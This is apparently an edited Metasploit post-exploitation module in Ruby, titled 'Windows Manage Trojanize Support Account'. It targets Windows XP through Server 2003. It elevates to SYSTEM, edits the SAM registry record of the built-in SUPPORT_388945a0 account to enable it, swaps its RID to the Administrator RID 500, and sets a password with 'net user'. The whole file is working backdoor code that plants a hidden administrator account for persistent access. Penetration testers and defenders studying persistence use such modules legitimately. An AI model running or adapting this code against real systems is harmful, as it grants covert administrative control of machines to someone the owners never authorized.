##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
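class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Priv

  # Registry location of the SAM user records. Reading/writing under HKLM\SAM
  # is why the module insists on running as SYSTEM.
  SAM_USERS_KEY = 'HKLM\\SAM\\SAM\\Domains\\Account\\Users'.freeze
  # Built-in help-and-support account whose SAM record is rewritten.
  SUPPORT_ACCOUNT = 'SUPPORT_388945a0'.freeze
  # Well-known RID of the built-in Administrator account.
  ADMIN_RID = 500

  # Layout of the per-user 'F' value that this module depends on: the RID is
  # a little-endian 32-bit integer at 0x30 and the account-control (ACB)
  # flags are a little-endian 16-bit word at 0x38, whose low bit is
  # ACB_DISABLED. Only these two fields are ever touched.
  F_RID_OFFSET = 0x30
  F_ACB_OFFSET = 0x38
  F_MIN_LENGTH = F_ACB_OFFSET + 2
  ACB_DISABLED = 0x0001

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Trojanize Support Account',
        'Description' => %q{
          This module enables alternative access to servers and workstations
          by modifying the support account's properties. It will enable
          the account for remote access as the administrator user while
          taking advantage of some weird behavior in lusrmgr.msc. It will
          check if sufficient privileges are available for registry operations,
          otherwise it exits.
        },
        'License' => MSF_LICENSE,
        'Author' => 'salcho <salchoman[at]gmail.com>',
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'References' => [ 'http://xangosec.blogspot.com/2013/06/trojanizing-windows.html' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              priv_elevate_getsystem
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('PASSWORD', [true, 'Password of the support user account', 'password']),
        OptBool.new('GETSYSTEM', [true, 'Attempt to get SYSTEM privilege on the target host.', false])
      ]
    )
  end

  # Entry point. Validates PASSWORD, makes sure the session is SYSTEM
  # (optionally via getsystem), restricts itself to XP through Server 2003
  # SP2, then locates the support account in the SAM, enables it, rewrites
  # its RID to ADMIN_RID and sets the requested password.
  #
  # Returns nil; progress and failures are reported through print_*.
  def run
    password = datastore['PASSWORD'].to_s
    # Fail on a bad option before the SAM is modified. The password is
    # passed to cmd.exe inside double quotes, so an embedded quote would
    # break out of the argument.
    if password.empty? || password.include?('"')
      print_error('PASSWORD must be non-empty and must not contain double quotes')
      return
    end

    return unless ensure_system

    version = get_version_info
    unless version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::Server2003_SP2)
      print_error("#{version.product_name} is not supported")
      return
    end
    print_status("Target OS is #{version.product_name}")

    rid = find_support_rid
    return if rid.nil?

    user_keys = registry_enumkeys(SAM_USERS_KEY)
    unless user_keys
      print_error("Couldn't enumerate #{SAM_USERS_KEY}")
      return
    end

    # Per-user subkeys are the zero-padded hex RID (e.g. 000003E8). The
    # 'Names' subkey parses to 0 and therefore never matches a real RID.
    user_key = user_keys.find { |key| key.to_i(16) == rid }
    unless user_key
      print_error("Couldn't find the SAM record for RID #{rid}")
      return
    end

    trojanize_record(user_key, password)
  end

  # Returns true when the session already runs as SYSTEM, or after a
  # successful getsystem when GETSYSTEM is set; prints an error and returns
  # false otherwise.
  def ensure_system
    return true if is_system?

    unless datastore['GETSYSTEM']
      print_error('You need to run this script as system!')
      return false
    end

    print_status('Trying to get system...')
    res = session.priv.getsystem
    if res[0]
      print_good('Got system!')
      true
    else
      print_error('Unable to get system! You need to run this script.')
      false
    end
  end

  # Looks the support account up under Users\Names and returns its RID,
  # which the SAM stores as the *type* of that key's default value.
  # Returns nil (after printing an error) when the key cannot be read, the
  # account is absent, or no RID is recorded.
  def find_support_rid
    names = registry_enumkeys("#{SAM_USERS_KEY}\\Names")
    unless names
      print_error("Couldn't access registry keys")
      return nil
    end

    print_status('Harvesting users...')
    # Registry key names are case-insensitive, so match the account that way.
    name = names.find { |candidate| candidate.casecmp?(SUPPORT_ACCOUNT) }
    unless name
      print_error("Couldn't find the #{SUPPORT_ACCOUNT} account")
      return nil
    end
    print_good("Found #{name} account!")

    info = registry_getvalinfo("#{SAM_USERS_KEY}\\Names\\#{name}", '')
    unless info
      print_error("Couldn't open user's key")
      return nil
    end

    rid = info['Type']
    unless rid.is_a?(Integer)
      print_error("Couldn't get user's RID...")
      return nil
    end
    print_status("Target RID is #{rid}")
    rid
  end

  # Rewrites the 'F' value of the SAM record stored under user_key: clears
  # ACB_DISABLED if set, overwrites the RID with ADMIN_RID, writes the value
  # back and finally sets the account password with `net user`. Any failed
  # read or write is reported and aborts the remaining steps.
  def trojanize_record(user_key, password)
    f_key = "#{SAM_USERS_KEY}\\#{user_key}"
    f = registry_getvaldata(f_key, 'F')
    if f.nil? || f.bytesize < F_MIN_LENGTH
      print_error("Couldn't read a usable F value from #{f_key}")
      return
    end
    # Work on a binary copy so byte-level edits never depend on the string
    # encoding the registry helper happened to return.
    f = f.b

    if check_active(f)
      print_status('Account is disabled, activating...')
      f = enable_account(f)
    else
      print_error('Target account is already enabled')
    end

    print_status('Swapping RIDs...!')
    f = swap_rid(f, ADMIN_RID)

    unless registry_setvaldata(f_key, 'F', f, 'REG_BINARY')
      print_error("Can't write to registry... Something's wrong!")
      return
    end

    print_status("Setting password to #{password}")
    # NOTE(review): `net user` on this OS range is believed to ask for
    # confirmation when the password exceeds 14 characters, which would stall
    # cmd_exec since nothing answers the prompt - confirm before relying on
    # long passwords.
    print_warning('Password is longer than 14 characters; net user may prompt and hang') if password.length > 14
    out = cmd_exec('cmd.exe', "/c net user #{SUPPORT_ACCOUNT} \"#{password}\"")
    vprint_status(out.to_s)
  end

  # Returns true when the ACB_DISABLED bit of the account-control flags at
  # offset 0x38 is set, i.e. the account is currently disabled. The name is
  # kept for compatibility; the check used to compare the whole byte with
  # 0x11 (ACB_NORMAL|ACB_DISABLED), which missed disabled accounts carrying
  # any other flag.
  def check_active(f_value)
    (f_value.getbyte(F_ACB_OFFSET) & ACB_DISABLED) != 0
  end

  # Clears only ACB_DISABLED in the flags byte at offset 0x38, leaving every
  # other control bit as it was, and returns the mutated buffer.
  def enable_account(f_value)
    flags = f_value.getbyte(F_ACB_OFFSET)
    f_value.setbyte(F_ACB_OFFSET, flags & (0xFF & ~ACB_DISABLED))
    f_value
  end

  # Overwrites the 32-bit little-endian RID at offset 0x30 with `rid` and
  # returns the mutated buffer. All four bytes are written; the previous
  # version only replaced the low 16 bits.
  def swap_rid(f_value, rid)
    f_value[F_RID_OFFSET, 4] = [rid].pack('V')
    f_value
  end
end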